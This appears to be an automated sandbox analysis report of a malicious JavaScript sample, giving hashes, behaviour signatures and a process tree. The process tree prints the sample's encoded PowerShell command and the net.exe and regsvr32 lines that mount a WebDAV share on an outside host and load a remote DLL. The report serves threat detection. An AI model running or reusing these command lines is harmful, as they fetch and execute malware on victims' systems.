Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
21/08/2024, 14:39
Static task
static1
Behavioral task
behavioral1
Sample
a5cf51b5bcc07a914aced393d01843fd704ed3008c4e5267137ae014af7b4cc9.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
a5cf51b5bcc07a914aced393d01843fd704ed3008c4e5267137ae014af7b4cc9.js
Resource
win10v2004-20240802-en
General
-
Target
a5cf51b5bcc07a914aced393d01843fd704ed3008c4e5267137ae014af7b4cc9.js
-
Size
13KB
-
MD5
acf3a27b869305e40e6adb63e5adb902
-
SHA1
f15c44f4a564cc18796234e51985e40d1ae5826c
-
SHA256
a5cf51b5bcc07a914aced393d01843fd704ed3008c4e5267137ae014af7b4cc9
-
SHA512
a4223d3ab0684b65758e6bf59d8643278bca09b2d7b2338b569c9df6f164de0d9033043f80e1e23c22c3f3ea0a645071416a7c57b324f04c9510c5d5b82ec03c
-
SSDEEP
96:QlgB0wuuVX1HVd5HrYdH6DItAt0UAPbZ+9EYiA99CPsEze6DItAt0UAPbZ+9EYip:QB+VFHwPZ/YPZ/BZf
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2712 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2848 wrote to memory of 2712 2848 wscript.exe 30 PID 2848 wrote to memory of 2712 2848 wscript.exe 30 PID 2848 wrote to memory of 2712 2848 wscript.exe 30 PID 2712 wrote to memory of 2056 2712 powershell.exe 32 PID 2712 wrote to memory of 2056 2712 powershell.exe 32 PID 2712 wrote to memory of 2056 2712 powershell.exe 32 PID 2712 wrote to memory of 2888 2712 powershell.exe 33 PID 2712 wrote to memory of 2888 2712 powershell.exe 33 PID 2712 wrote to memory of 2888 2712 powershell.exe 33 PID 2712 wrote to memory of 2888 2712 powershell.exe 33 PID 2712 wrote to memory of 2888 2712 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\a5cf51b5bcc07a914aced393d01843fd704ed3008c4e5267137ae014af7b4cc9.js1⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADEAMgAyADMAMAAzADAANAA3ADQAMgA3ADEAMwAwAC4AZABsAGwA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2056
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\122303047427130.dll3⤵PID:2888
-
-